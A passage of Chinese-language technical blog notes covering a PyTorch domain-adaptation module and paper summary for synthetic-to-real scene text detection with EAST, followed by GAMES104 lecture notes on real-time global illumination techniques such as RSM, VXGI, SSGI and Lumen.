    for l in [self.fc1_da, self.fc2_da]: # 权重初始化为均值为 0,标准差为 0.01 的正态分布(对于 fc1_da 和 fc2_da),fc3_da 的权重标准差为 0.05,偏置初始化为 0。
    nn.init.normal_(l.weight, std=0.01)
    nn.init.constant_(l.bias, 0)
    nn.init.normal_(self.fc3_da.weight, std=0.05)
    nn.init.constant_(self.fc3_da.bias, 0)

    def forward(self, x): # 输入 x 先通过 fc1_da 和 ReLU 激活,然后经过 50% 的 dropout,再通过 fc2_da 和 ReLU 激活,再次经过 50% 的 dropout,最后通过 fc3_da 得到输出。
    x = F.relu(self.fc1_da(x))
    x = F.dropout(x, p=0.5, training=self.training)

    x = F.relu(self.fc2_da(x))
    x = F.dropout(x, p=0.5, training=self.training)

    x = self.fc3_da(x)
    return x


    class DomainAdaptationModule(torch.nn.Module):
    """
    这个模块的主要作用是通过领域自适应来处理图像特征,使得模型能够更好地适应不同的领域。
    Module for Domain Adaptation Component. Takes feature maps from the backbone and instance
    feature vectors, domain labels and proposals. Works for both FPN and non-FPN.
    域适配组件模块。从主干和实例特征向量、域标签和建议中提取特征图。适用于 FPN 和非 FPN。
    """

    def __init__(self):
    super(DomainAdaptationModule, self).__init__()

    self.avgpool = nn.AvgPool2d(kernel_size=7, stride=7) # 一个 7x7 的平均池化层,将输入的特征图缩小到 1x1。
    self.gap = nn.AdaptiveAvgPool2d(1) # 自适应平均池化层,将输入特征图压缩成每个通道一个值。
    self.sigmoid_gap = nn.Sigmoid() # 一个 Sigmoid 激活函数,将特征值压缩到 [0, 1] 范围。

    self.grl_img = GradientScalarLayer(-1.0 * 0.1) # 应用梯度反转层,用于在反向传播时反转梯度,鼓励网络学习领域不变特征。
    self.grl_ins = GradientScalarLayer(-1.0 * 0.1)
    self.grl_img_consist = GradientScalarLayer(1.0 * 0.1) # 与 grl_img 和 grl_ins 类似,但用于不同的目标。
    self.grl_ins_consist = GradientScalarLayer(1.0 * 0.1)

    self.imghead = DAImgHead() # 处理图像级特征的网络头部,用于领域分类。
    self.inshead = DAInsHead() # 处理实例级特征的网络头部,用于领域分类。


    def forward(self, img_features):
    """
    Arguments:
    img_features (list[Tensor]): features computed from the images that are used for computing the predictions. 从用于计算预测的图像中计算出的特征。
    da_ins_feature (Tensor): instance-level feature vectors 实例级特征向量。
    da_ins_labels (Tensor): domain labels for instance-level feature vectors 实例级特征向量目标的域标签
    targets (list[BoxList): ground-truth boxes present in the image (optional) 实例级特征向量目标的域标签(list[BoxList):图像中存在的地面真值框(可选)

    Returns:
    losses (dict[Tensor]): the losses for the model during training. During testing, it is an empty dict. 模型在训练过程中的损失。在测试过程中,它是一个空字典。
    """
    img_grl_fea = self.grl_img(self.gap(img_features)) # 经过 grl 的 image-level feature # 通过 gap 层将特征图压缩为 1x1,然后通过 grl_img 反转梯度。

    da_img_features = self.sigmoid_gap(self.imghead(img_grl_fea)) # 对 image-level feature 的每个层都压成 1*1 # 通过 imghead 处理反转后的图像特征,再经过 sigmoid_gap 激活函数,将每个特征值压缩到 [0, 1] 范围。

    return da_img_features
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    class EAST(nn.Module):  # EAST 继承自 nn.Module,这是 PyTorch 中所有神经网络模型的基类。
    def __init__(self, pretrained=True):
    super(EAST, self).__init__()
    self.extractor = extractor(pretrained) # 初始化一个特征提取器。extractor 可能是一个预训练的卷积神经网络或类似模块,用于从输入图像中提取特征。如果 pretrained=True,则可能会使用预训练权重。
    self.merge = merge() # 初始化一个合并模块。merge 可能是一个用于处理提取到的特征的模块。
    self.output = output() # 初始化一个输出模块。output 可能是一个用于生成最终预测的模块。

    self.DomainAdaptation = DomainAdaptationModule() # 初始化一个领域自适应模块。DomainAdaptationModule 可能用于对特征进行领域自适应处理,以适应不同的数据分布或任务。

    def forward(self, x): # forward 方法定义了前向传播的计算过程,即如何将输入数据 x 通过网络进行处理,得到模型的输出。
    C = self.extractor(x) # 将输入 x 传递给特征提取器,得到特征 C。C 可能是一个包含多个特征图的列表或字典,其中 C[3] 是其中的一个特征图。
    class_domain = self.DomainAdaptation(C[3]) # 将特征图 C[3] 传递给领域自适应模块,得到 class_domain。这是对特征图进行领域自适应处理后的结果。

    return self.output(self.merge(C)), class_domain
    # self.merge(C): 将特征 C 传递给合并模块,合并不同层的特征。
    # self.output(self.merge(C)): 将合并后的特征传递给输出模块,生成最终预测。
    # return self.output(self.merge(C)), class_domain:返回两个值,分别是模型的最终预测结果和领域自适应模块的输出。

    3.3 Text Self-Training

    ​以前的工作已经证明了自我训练对领域适应的有效性。然而,自我训练的两个主要问题仍然需要进一步探讨:假阳性(FP)(实际没有,预测有)和假阴性(FN)(实际有,预测没有)发生在伪标签。不正确的伪标签会对我们的网络造成非常严重的负面影响。为了克服这些问题,TST 被设计成最小化 FP 和 FN 的不利影响。

    3.3.1 Reducing False Negatives.

    webp

    Up:提出了文本自我训练的框架。我们利用 SWS 对伪标签中的阳性样本进行过滤,以最大限度地减少假阳性,并选择三分之一置信度较低的阴性样本作为最终阴性样本,以最大程度地减少假阴性。
    Down:我们给出了伪标签的样本空间表示。
    (a):薄弱的训练可以有效地过滤掉假阴性。
    (b):假阳性通过笔划宽度和 SWS 的标准偏差($\sigma$)过滤掉。

    ​受 [1909.00597] Self-Training and Adversarial Background Regularization for Unsupervised Domain Adaptive One-Stage Object Detection (arxiv.org) 的启发,利用弱监督方式来最小化假阴性的影响。如 EAST 中所定义的,原始分数图损失是

    $$L_s=-\sum_{i\in Pos}\beta Y^log\widehat{Y}-\sum_{i\in Neg}(1-\beta)(1-Y^)(1-\widehat{Y})$$

    ​ 其中 $\widehat Y=F_s$ 是分数图的预测,$Y^*$ 是基本事实。

    ​ 虽然网络是通过反向传播学习背景损失(即负面例子)来优化的,但在伪标签中出现的 $\mathrm{FP}$ 误导了网络。我们假设 $\mathrm{FP}$ 主要是通过硬负挖掘来选择的,例如模糊的文本和与背景相似的不寻常字体。为了减少 $\mathrm{FP}$ 的不利影响,我们忽略了一些有可能成为置信度得分的前景的背景例子。

    ​ EAST 的负面例子是像素图,一个像素更有可能被视为负面像素,而相应的置信度得分更高。

    ​ 因此,我们选择置信度得分最低的负样本像素(例如,$Neg/3$)的一部分作为最终的负示例,在图中表示为 $\widehat{Neg}/3$(红线)。相应的数学表达式为 $\widehat{Neg}=\eta Neg$,其中 $\eta$ 在所有实验中都设置为 $1/3$。对于那些具有高置信度分数的像素,网络不会优化该部分损失。最后,修改后的损失函数定义为:

    $$\begin{aligned}L_{sw}&=-\sum_{i\in Pos}\beta Y_i*log\widehat{Y}-\sum_{i\in\widehat{Ne}g}(1-\beta)(1-Y_i*)(1-\widehat{Y})\end{aligned}$$

    3.3.2 Reducing False Positives.

    与假阴性相对应的是,假阳性也会对网络造成严重干扰。自然场景中的一些图案和设计极易被识别为文本,从而导致伪标签不准确。取支持区域可靠分数(SRRS),我们提出了一种更合理的笔划宽度分数(SWS),该分数利用笔划宽度变换(SWT)来评估文本实例的预测框。

    $$SRRS(r*)=\frac1{N_s}\sum_{i=1}{N_s}IoU(r_i,r^)\cdot P(c^|r_i)$$

    ​EAST 是一种基于分割的方法,不需要 FPN,对于面积较小的文本实例,$r_i$)比面积大的支承箱数量多,这就导致了支承箱数量(即,$N_s$)的函数。另一方面,SWT 对于消除非文本区域更合理,并且类似的先前工作已经显示了其有效性。SWT 是一个局部图像运算符,它计算每个像素的最可能笔划宽度。SWT 的 输出是一个 $n * m$ 矩阵,其中每个元素包含与该像素相关联的笔划的宽度。具体地说,笔划边界上的每个象素在梯度方向上与笔划的相对侧相连,并且连接线的宽度是该象素的笔划宽度。SWS 利用相应笔画宽度的信息对预测的方框进行评估,并消除部分非文本区域,如图 3(蓝线)所示。对于典型的文本区域,笔画宽度的变化很小,因为文本倾向于保持固定的笔画宽度。我们将第 v 个预测框中的笔划宽度的集合表示为 $W^v_n$,并且将 $u_{th}$ 像素的笔划宽度表示为 $w^v_u\in W^v_n$。标准差如下:

    $$\sigma_v=\sqrt{\frac{1}{N}\sum_{u=1}N(w_uv-\muv)2}$$

    ​其中 $\mu^v$ 是 $v_{th}$ 个预测框中的平均笔画宽度。因此,每个预测框都有一个关于笔画宽度的标准差($\sigma$),我们选择具有上限阈值($\epsilon _1$)的可靠框。此外,我们还通过 SWS 进一步过滤框:

    $$SWS_v=\frac{w_v}{\sigma_v^2}$$

    ​$w_v$ 是第 $v$ 个预测框的最常见的笔画宽度值。通过用较低的阈值 $\epsilon_2$ 对分数进行阈值化,进一步选择框。图 3(b)显示部分 FP 被 SWS 和$\sigma$ 滤除。

    4 Experiments

    ​通过将场景文本检测器从合成数据集转移到真实的数据集来评估所提出的方法。我们采用几个纯合成数据和真实的场景数据(即,SynthText 和 ICDAR2015),它们具有共同的注释风格(即,字级)。

    4.1 Dataset and Experimental Settings

    4.1.1 Pure Synthetic Datasets.

    • SynthText 是一个包含约 80 万合成图像的大规模数据集。这些图像是通过将自然图像与随机字体,大小,颜色和方向渲染的文本混合而创建的,因此这些图像非常逼真。

    • VISD 包含与 10k 背景图像合成的 10k 图像。因此,该数据集没有重复的背景图像。丰富的背景图像使该数据集更加多样化。

    4.1.2 Real Datasets.

    • ICDAR 2015 是一个面向英文文本的多方向文本检测数据集,仅包含 1,000 张训练图像和 500 张测试图像。此数据集中的场景文本图像由 Google 眼镜拍摄,没有考虑定位,图像质量和视点。该数据集具有小的,模糊的和多方向的文本实例。

    • ICDAR 2013 在 ICDAR 2013 Robust 阅读竞赛期间发布,用于聚焦场景文本检测,包括高分辨率图像,229 用于训练,233 用于测试,包含英文文本。

    4.1.3 Implementation Details.

    ​在所有实验中,我们使用 EAST 作为基础网络。在原始论文之后,输入被调整为 512×512,并且我们应用了原始论文中使用的所有增强。该网络使用由 12 幅图像组成的批量输入进行训练,其中 6 幅图像来自源域,另外 6 幅图像来自目标域。Adam 优化器被采用作为我们的学习率方案。所有实验都使用相同的训练策略:

    1. 使用 ATA 对网络进行 80k 次迭代的预训练,以学习域不变特征,
    2. 使用预训练的模型来生成相应的伪标签(即,伪边界框标签和负样本图),然后用生成的伪标签微调预训练模型。在生成伪标签的过程中,我们将笔划宽度消除参数设置为 3.0 和 0.30。

    ​所有实验都在常规工作站(CPU:Intel(R)Core(TM)i7- 7800 X CPU@3.50 GHz; GPU:GTX 2080 Ti)上进行。

    4.2 Performance Comparison and Analysis

    webp

    不同模型在 Syn2Real 场景文本检测数据集上的性能,用于 SynthText/VISD → ICDAR 2015 传输。UL 指未标记的数据。* 表示 UnrealText 中报告的性能。† 指的是我们的测试性能。

    webp

    不同模型在 Syn2Real 场景文本检测数据集上的性能,用于 SynthText/VISD → ICDAR 2013 传输。UL 指未标记的数据。*表示 UnrealText 中报告的性能。† 指的是我们的测试性能。

    4.2.1 Synthetic→ ICDAR2015 Transfer.

    ​表 1 总结了合成→ ICDAR 2015 转移任务的性能比较。EAST 模型作为仅使用源代码的基线训练具有不令人满意的 F 分数(使用 SynthText 为 60.5%,使用 VISD 为 64.5%),这可以被视为没有自适应的下限。通过结合所提出的方法,F-评分分别达到 68.0% 和 73.8%,比基线分别提高了 7.5% 和 9.3%。基于字符注释的 GCN 比基于单词注释的性能有所提高。然而,GCN 的性能仍然低于我们的方法,它利用了自我训练和对抗学习。实验结果表明,该方法能够有效地消除源数据和目标数据的领域差异。

    4.2.2 Synthetic→ ICDAR2013 Transfer.

    ​为了进一步验证该方法的有效性,以 ICDAR 2013 为目标域,进行了合成到真实的场景文本检测迁移的实验。实验结果报告在表 2 中。具体来说,对于 SynthText→ ICDAR 2013 转移任务,与仅使用源代码的基线 EAST 训练相比,我们实现了 11.3% 的性能提升。与合成→ICDAR2015 转移实验类似,VISD 也被用作比较实验中的源域。在使用 ATA 和 TST 后,该方法比基线 EAST 的性能提高了 6.3%,这表明该方法在减少域偏移方面的有效性。请注意,为了公平比较,除了添加 ATA 和 TST 之外,所提出的方法的基础网络和实验设置与基线 EAST 相同。

    4.2.3 ICDAR2013→ ICDAR2015 Transfer.

    ​表 3 显示了 ICDAR 2013 → ICDAR 2015 转移任务的性能。ICDAR 2013 的注释是矩形框,而 ICDAR 2015 的注释是旋转框,这限制了传输性能。然而,与仅使用源代码的基线 EAST 训练相比,我们实现了 7.6% 的性能提升。

    webp

    不同型号的检测结果示例。第一行是仅使用源域的基线训练的结果。第二行是使用所提出方法的结果。

    4.3 Ablation Study

    4.3.1 Component Analysis.

    ​为了验证所提出方法的有效性,我们在四个数据集上进行了 Syn2Real 转移任务的消融实验:SynthText、VISD、ICDAR2015 和 ICDAR2013。表 3 显示了实验结果。对于 SynthText→ICDAR2015 转移任务,使用 TST 和 ATA 后,F-得分分别提高了 4.1% 和 3.5%。此外,我们的方法比基线产生了高达 8% 的召回率,这表明了这种方法在提高模型鲁棒性方面的有效性。通过结合这两个组成部分,所提出方法的 F-得分达到了 68.0%,比基线绝对提高了 7.5%。VISD→ICDAR2015 转移任务表现更好,因为 VISD 具有更真实的合成效果。特别是,使用我们的方法的 F-得分达到了 73.8%,比相应的基线绝对提高了 9.3%。对于 SynthText/VISD→ICDAR2015 的传输,性能的提高也很显著。我们使用 SynthText 实现了 11.3% 的性能改进,使用 VISD 实现了 6.3% 的性能改善。

    webp

    消融研究所提出的 Syn2Real 场景文本检测转移。“基线”表示仅使用源域中的标记数据进行训练。表示与仅使用源代码的基线训练相比,F-分数的增加。UL 指未标记的数据。'F-target'表示在源域中进行预训练,并在目标域中使用原始伪边界框进行微调。

    4.3.2 Parameter Sensitivity on TST.

    ​为了探索阈值参数(即,在 SWS 上,我们进行了几组比较实验,结果如表 4 所示。由于我们认为在理想情况下文本区域中的笔画宽度的标准差接近于零,因此使用阈值参数 $\epsilon_1$ 来过滤预测框。结果表明,当神经网络的参数为 1 时,网络的性能最好,且网络的性能对参数的变化不敏感。与 $\epsilon_1$ 相似,采用 0.2、0.3、0.4 三个不同的值对 $\epsilon_2$ 的参数敏感性进行了验证,结果表明 $\epsilon_2$ 的值(0.3)是合理的。

    webp

    4.3.3 Qualitative Analysis.

    ​图 4 示出了用于合成到真实的转换任务的文本检测结果的四个示例。实验结果表明,该方法提高了模型在不同复杂背景和不同文本下的鲁棒性。TST 最小化了 FP 和 FN 的一部分,如第一列示例所示,ATA 帮助模型学习更多有区别的特征。

    webp

    5 Conclusions

    ​本文首先介绍了一种用于场景文本检测的合成域到真实的域自适应方法,该方法将知识从合成数据(源域)转移到真实的数据(目标域)。提出的文本自训练(TST)有效地减少了伪标签的假阴性和假阳性的不利影响,而对抗性文本实例对齐(ATA)有助于网络以对抗的方式学习更多的域不变特征。我们评估了所提出的方法与 EAST 在几个常见的合成和真实的数据集。实验结果表明,该方法对于合成到真实的迁移文本检测任务有很大的改进。

    ]]>
    @@ -877,7 +877,7 @@ /posts/GAMES104-Dynamic%20Global%20Illumination%20and%20Lumen/ - 资源

    课程

    第二十一节:动态全局光照和 Lumen

    Global Illumination (GI)

    全局光照

    The Rendering Equation

    渲染方程

    James Kajiya,”The Rendering Equation.”
    SIGGRAPH 1986.
    Energy equilibrium:

    $L_o(x,\omega_o)=L_e(x,\omega_o)+\int_{H^2}f_r(x,\omega_o,\omega_i)L_i(x,\omega_i)\cos\theta_id\omega_i$

    outgoing = emitted + reflected

    Radiance and Irradiance 辐射和辐照度

    webp

    ​这个方程揭示了渲染的规律。

    Global Illumination: Billions of Light Source

    全球照明:数十亿光源

    webp

    ​然而,要计算渲染方程的积分可不容易,现实生活中的反射有无数次。

    Global Illumination is Matter for Gaming

    全局照明对游戏很重要

    webp

    ​游戏中要加上一个全局照明以近似周围环境反射而来的光照效果。

    Monte CarloIntegration

    蒙特卡洛一体化

    webp

    • How to solve an integral, when it’s too hard to solve it analytically?

      当一个积分很难解析求解时,如何求解它?

    webp

    • Approximate integral with the average of randomly sample values

      随机样本值平均值的近似积分

    Monte Carlo Ray Tracing (Offline)

    蒙特卡罗射线追踪(离线)

    webp

    ​使用蒙特卡洛算法求解渲染方程中的积分。

    Sampling is the Key

    采样是关键

    • Noise decreases as the number of samples per pixel increases. The top left shows 1sample per pixel, and doubles from left to right each square.

      噪声随着每像素采样数的增加而降低。左上角显示每个像素 1 个样本,每个方格从左到右加倍。

    webp

    Sampling : Uniform Sampling

    取样:均匀取样

    webp

    $\begin{aligned}
    \int_a^bf(x)\mathrm{~d}x& \begin{aligned}&=\lim_{n\to\infty}\frac{1}{n}\sum_{i=1}^{n}f(x_i)(b-a)\end{aligned} \
    &=\lim_{n\to\infty}\frac1n\sum_{i=1}^n\frac{f(x_i)}{\frac1{b-a}}
    \end{aligned}$

    • We are doing uniform random sample, so we have factor $\frac{1}{b-a}$ here

      我们正在进行均匀随机采样,因此这里有因子$\frac{1}{b-a}$

    Probability Distribution Function

    概率分布函数

    webp

    $\int_a^bf(x)\mathrm{d}x\sim F_n(X)=\frac1n\sum_{k=1}^n\frac{f(X_k)}{PDF(X_k)}$

    Probability Distribution Function

    概率分布函数

    • Describes the relative likehood for this random variable to take on a given value

      描述此随机变量取给定值的相对可能性

    • Higher means more possible to be chosen

      更高意味着更有可能被选择

    Importance Sampling

    重要性采样

    The PDF can be arbitrary, but which is the best?

    PDF 可以是任意的,但哪个是最好的?

    webp

    Importance Sampling : Best PDF for Rendering?

    重要性采样:最佳的 PDF 渲染?

    • Rendering equation:

      渲染方程式:

      $L_o\left(p,\omega_o\right)=\int_{\Omega^+}L_i\left(p,\omega_i\right)f_r\left(p,\omega_i,\omega_o\right)\left(n\cdot\omega_i\right)\mathrm{d}\omega_i$

    • Monte Carlo Integration:

      蒙特卡洛积分:

      $L_o\left(p,\omega_o\right)\approx\frac{1}{N}\sum_{i=1}^{N}\frac{L_i\left(p,\omega_i\right)f_r\left(p,\omega_i,\omega_o\right)\left(n\cdot\omega_i\right)}{p\left(\omega_i\right)}$

    • What’s our f(x)?

      $L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)$

    • What’s our pdf?

      • Uniform: $p(\omega_i)=\frac1{2\pi}$
      • Other pdf? (cosine-weight, GGX)(余弦权重,GGX)

    Importance Sampling : PDF is Matter

    重要性采样:PDF 很重要

    webp

    ​重要性采样比均匀采样渲染出的效果更好。

    Importance Sampling: Cosine and GGX PDF

    重要性采样:余弦和 GGX PDF

    webp

    ​换一种 PDF 会产生不同的渲染效果。

    Reflective Shadow Maps (RSM, 2005)

    Let’s inject light in. (Photon Mapping?)

    反射阴影贴图(RSM,2005)

    让我们注入光线。(光子映射?)

    • Each pixel on the shadow map is a indirect light source

      阴影贴图上的每个像素都是间接光源

    webp

    • How the RSM pixel $X_p$ illuminates position $x$?

      RSM 像素 $X_p$ 如何照亮位置 $X$?

    $E_p(x,n)=\phi_p\frac{\max{0,\langle n_p|x-x_p\rangle}\max{0,\langle n|x_p-x\rangle}}{|x-x_p|^4}$

    • The indirect irradiance at a surface point $x$ can be approximated by summing up the illumination due to all pixel lights.

      表面点 $x$ 处的间接辐照度可以通过将所有像素光的照度相加来近似。

    • Do not consider occlusion.

      不要考虑遮挡。

    $$E(x,n)=\sum_{\text{pixels}p}E_p(x,n)$$

    webp

    Cone Tracing with RSM

    使用 RSM 进行锥体追踪

    • Gathering Indirect Illumination

      收集间接照明

      • random sampling RSM pixels

        随机采样 RSM 像素

      • precompute such a sampling pattern and reuse it for all indirect light computations

        预先计算这样的采样模式,并将其重新用于所有间接光计算

        • 400samples were sufficient

          400 个样本就足够了

        • use Poisson sampling to obtain a more even sample distribution

          使用泊松采样获得更均匀的样本分布

    webp

    Sampling pattern example. The sample density decreases and the sample weights (visualized by the disk radius) increases with the distance to the center.

    采样模式示例。随着到中心的距离的增加,样品密度降低,样品重量(通过圆盘半径显示)增加。

    Acceleration with Low-Res Indirect Illumination

    低分辨率间接照明加速

    • Compute the indirect illumination for a low resolution image

      计算低分辨率图像的间接照明

    • For each pixel on full resolution:

      对于全分辨率的每个像素:

      • get its four surrounding low-res samples

        获取其四个周围的低分辨率样本

      • validate by comparing normal and world space position

        通过比较正常空间位置和世界空间位置进行验证

      • bi-linear interpolation

        双线性插值

    • Recompute the left (red pixels)

      重新计算左侧(红色像素)

    webp

    Gears of War 4, Uncharted 4, The Last of US, etc.

    《战争机器 4》、《神秘海域 4》、“最后的美国”等

    webp

    Thanks, RSM

    Cool Ideas

    很酷的想法

    • Easy to be implemented

      易于实施

    • Photon Injection with RSM

      RSM 的光子注入

    • Cone sampling in mipmap

      mipmap 中的圆锥采样

    • Low-res Indirect illumination with error check

      低分辨率间接照明,带错误检查

    Cons

    缺点

    • Single bounce

      单次反弹

    • No visibility check for indirect illumination

      间接照明不进行能见度检查

    webp

    Light Propagation Volumes (LPV)

    光传播体积(LPV)

    First introduced in CryEngine 3(SIGGRAPH 2009)

    首次引入 CryEngine 3(SIGGRAPH 2009)

    webp

    • Key Idea

      核心思想

      • Use a 3D grid to propagate radiance from directly illuminated surfaces to anywhere else

        使用 3D 网格将辐射从直接照射的表面传播到其他任何地方

    webp

    Steps

    步骤

    1. Generation of radiance point set scene representation

      辐射点集场景表示的生成

    2. Injection of point cloud of virtual light sources into radiance volume

    将虚拟光源的点云注入辐射体积

    1. Volumetric radiance propagation

      体积辐射传播

    2. Scene lighting with final light propagation volume

      具有最终光传播量的场景照明

    Reflective shadow map generation → Radiance injection → Radiance propagation → Scene lighting

    反射阴影贴图生成→辐射注入→辐射传播→场景照明

    “Freeze” the Radiance in Voxel

    “冻结”体素中的光芒

    Light Injection

    光注入

    • Pre-subdivide the scene into a 3D grid

      将场景预细分为 3D 网格

    • For each grid cell, find enclosed virtual light sources

      对于每个网格单元,找到封闭的虚拟光源

    • Sum up their directional radiance distribution

      总结它们的方向辐射分布

    • Project to first 2 orders of SHs (4 in total)

      前 2 个 SH 订单的项目(共 4 个)

    webp

    Radiance Propagation

    辐射传播

    • For each grid cell, collect the radiance received from each of its 6 faces

      对于每个网格单元,收集从其 6 个面中的每一个面接收到的辐射

    • Sum up, and again use SH to represent

      总结一下,再次用 SH 表示

    • Repeat this propagation several times till the volume becomes stable

      重复此传播几次,直到体积稳定

    webp

    Light with “Limit Speed”?

    “限速”灯

    webp

    Sparse Voxel Octree for Real-time Global Illumination (SVOGI)

    稀疏体素八叉树用于实时全局照明(SVOGI)

    Voxelization Pass

    体素化通行证

    webp

    Collect Surface Voxels

    收集表面体素

    webp

    webp

    • Inject Irradiance into voxels from light

      从光线向体素中注入辐照度

    • Filter irradiance inside the octree

      八叉树内部的过滤辐照度

    Shading with Cone Tracing in Voxel Tree

    体素树中的圆锥体跟踪着色

    Pass 2 from the camera

    从相机中传 2

    • Emit some cones based on diffuse + specular BRDF

      基于漫反射 + 镜面反射 BRDF 发射一些锥体

    • Query in octree based on the (growing) size of the cone

      基于圆锥体(增长)大小的八叉树查询

    webp

    Voxelization Based Global Illumination (VXGI)

    基于体素化的全局照明(VXGI)

    webp

    • Store the voxel data in clipmaps

      将体素数据存储在 clipmap 中

      • Multi-resolution texture

        多分辨率纹理

      • Regions near the center have higher spatial resolution

        中心附近的区域具有更高的空间分辨率

      • Seems to map naturally to cone tracing needs

        似乎很自然地映射到锥体跟踪需求

    • A clipmap is easier to build than SVO

      clipmap 比 SVO 更容易构建

      • No nodes, pointers etc., handled by hardware

        没有由硬件处理的节点、指针等

    • A clipmap is easier to read from

      Clipmap 更容易阅读

    • Clipmap size is (64…256)^3 with 3…5 levels of detail

      Clipmap 大小为(64…256)^3,具有 3…5 个细节级别

      • 16…32 bytes per voxel => 12 MB … 2.5 GB of video memory required

        每个体素 16…32 字节=>12 MB…需要 2.5 GB 的视频内存

    Voxel Update and Toroidal Addressing

    体素更新和环形寻址

    • A fixed point in space always maps to the same address in the clipmap

      空间中的固定点总是映射到剪贴图中的同一地址

    • The background shows texture addresses: frac(worldPos.xy / clipmapSize.xy)

      背景显示纹理地址:frac(worldPos.xy / clipmapSize.xy)

    webp

    webp

    Voxelization for Opacity

    不透明度的体素化

    • We have a triangle and a voxel

      我们有一个三角形和一个体素

    • Select the projection plane that yields the biggest projection area

      选择产生最大投影面积的投影平面

    • Rasterize the triangle using MSAA to compute one coverage mask per pixel

      使用 MSAA 对三角形进行光栅化,以计算每个像素的一个覆盖掩模

    • Take the MSAA samples and reproject them onto other planes

      采集 MSAA 样本并将其重新投影到其他平面上

    • Repeat that process for all covered samples

      对所有覆盖的样本重复该过程

    • Thicken the result by blurring all the reprojected samples

      通过模糊所有重新投影的样本来增加结果

    webp

    Voxelization: Directional Coverage

    体素化:定向覆盖

    webp

    Light Injection

    光注入

    • Calculate emittance of voxels that contain surfaces lit by direct lights

      计算包含由直射光照亮的表面的体素的发射度

    • Take information from reflective shadow maps (RSM)

      从反射阴影图(RSM)中获取信息

    webp

    webp

    Shading with Cone Tracing

    使用圆锥体追踪进行着色

    • generate several cones based on BRDF

      基于 BRDF 生成多个锥体

    webp

    Accumulate Voxel Radiance and Opacity along the Path

    沿路径累积体素辐射度和不透明度

    $$C_{\mathrm{dst}}\leftarrow C_{\mathrm{dst}}+(1-\alpha_{\mathrm{dst}})C_{\mathrm{src}}\\alpha_\mathrm{dst}\leftarrow\alpha_\mathrm{dst}+(1-\alpha_\mathrm{dst})\alpha_\mathrm{src}$$

    webp

    webp

    Problems in VXGI

    VXGI 中的问题

    Incorrect Occlusion (opacity)

    遮挡不正确(不透明)

    • naively combine the opacity with alpha blending.

      天真地将不透明与阿尔法混合结合起来。

    Light Leaking

    漏光

    • when occlusion wall is much smaller than voxel size

      当闭塞壁远小于体素尺寸时

    webp

    Screen Space Global Illumination (SSGI)

    屏幕空间全局照明(SSGI)

    General Idea

    总体思路

    • Reuse screen-space data

      重复使用屏幕空间数据

    webp

    Radiance Sampling in Screen Space

    屏幕空间中的辐射采样

    For each fragment:

    对于每个片段:

    • Step 1: compute many reflection rays

      步骤 1:计算许多反射光线

    • Step 2: march along ray direction (in depth gbuffer)

      步骤 2:沿射线方向行进(在深度 gbuffer 中)

    • Step 3: use color of hit pointas indirect lighting

      步骤 3:使用目标点的颜色作为间接照明

    webp

    Linear Raymarching

    线性射线推进

    • General Steps

      一般步骤

      • Step forward at a fixed step size

        以固定步长向前迈进

      • At each step, check depth value

        每一步,检查深度值

    • Features

      特征

      • Fast

        快速

      • May skip thin objects

        可能跳过薄物体

    webp

    Hierachical Tracing

    层次追踪

    • Generate min-depth mipmap (pyramid)

      生成最小深度 mipmap(金字塔)

    • Stackless ray walk of min-depth mipmap

      最小深度 mipmap 的无堆叠射线行走

    webp

    level = 0;
    while(level > -1)
    {
    stepcurrentcell();
    if (above z plane) level++;
    if (below z plane) level--;
    }

    webp

    Ray Reuse among Neighbor Pixels

    相邻像素间的光线复用

    • Store hitpoint data

      存储命中点数据

    • Assume visibility is the same between neighbors

      假设邻居之间的能见度相同

    • Regard ray to neighbor’s hitpointas valid

      将邻居的 hitpoint 视为有效

    webp

    Cone Tracing with Mipmap Filtering

    基于 Mipmap 滤波的圆锥跟踪

    Estimate footprintof a coneat hit point

    估算锥形撞击点的足迹

    • roughness

      粗糙度

    • distance to hit

      击中距离

    Sample the color mipmap

    对彩色 mipmap 进行采样

    • mip level is determined by footprint

      mip 级别由足迹决定

    Pre-filter color mipmap (pyramid)

    预过滤彩色 mipmap(金字塔)

    webp

    SSGI Summary

    SSGI 总结

    • Pros:

      优点:

      • Fast for glossy and specular reflections

        快速实现光泽和镜面反射

      • Good quality

        质量好

      • No occlusion issues

        无遮挡问题

    • Cons:

      缺点:

      • Missing information outside screen

        屏幕外信息缺失

      • Affects of incorrect visibility of neighbor ray reuse

        相邻射线重用可见性不正确的影响

    webp

    Unique Advantages of SSGI

    SSGI 的独特优势

    • Easy to handle close contact shadow

      易于处理近距离接触阴影

    • Precise hit point calculation

      精确的命中点计算

    • Decouple from scene complexity

      与场景复杂性解耦

    • Handle dynamic objects

      处理动态对象

    Lumen

    ​Lumen 是一个实时全局光照系统,由 Epic Games 开发,用于其虚幻引擎(Unreal Engine)。它旨在提高游戏和其他实时应用中的光照效果的真实感。Lumen 可以动态地计算光线的传播、反射和折射,无需事先烘焙光照贴图,因此能更好地适应场景的变化,比如光线源的移动或物体的位置改变。它通过实时计算来模拟复杂的光照效果,比如间接光和反射,使得视觉效果更加自然和沉浸。

    Ray Traces are slow

    光线追踪很慢

    • Can only afford 1/2 ray per pixel

      每像素只能提供 1/2 射线

    • But quality GI needs hundreds

      但高质量的 GI 需要数百个

    webp

    Sampling is hard

    取样很困难

    Previous real-time work: Irradiance Fields

    以前的实时工作:辐照度场

    • Problems:

      问题:

      • Leaking and over-occlusion

        渗漏和过度堵塞

      • Probe placement

        探头放置

      • Slow lighting update

        照明更新缓慢

      • Distinctive flat look

        独特的扁平外观

    Previous real-time work: Screen Space Denoiser

    以前的实时工作:屏幕空间去噪器

    • Problems:

      问题:

      • Too noisy in many difficult indoor cases

        在许多困难的室内环境中噪音太大

      • Noise is not constant.

        噪音不是恒定的。

    webp

    Low-res filtered scene space probes lit full pixels

    低分辨率滤波场景空间探测器照亮了全像素

    webp

    Phase 1 : Fast Ray Trace in Any Hardware

    阶段 1:任何硬件中的快速光线追踪

    Signed Distance Field (SDF)

    签名距离字段(SDF)

    What is SDF

    • The distance to the nearest surface at every point

      每个点到最近曲面的距离

    • Inside regions store negative distance (signed)

      内部区域存储负距离(带符号)

    • Distance = 0 is the surface

      距离 = 0 是曲面

    webp

    Per-Mesh SDF

    每网格 SDF

    Store SDF of the whole scene is expensive

    整个场景的商店 SDF 都很贵

    Generated for each mesh

    为每个网格生成

    • Resolution based on mesh size

      基于网格大小的分辨率

    • Embree point query

      Embree 积分查询

    • Trace rays and count triangle back faces for sign ( more than 25% hit back is negative)

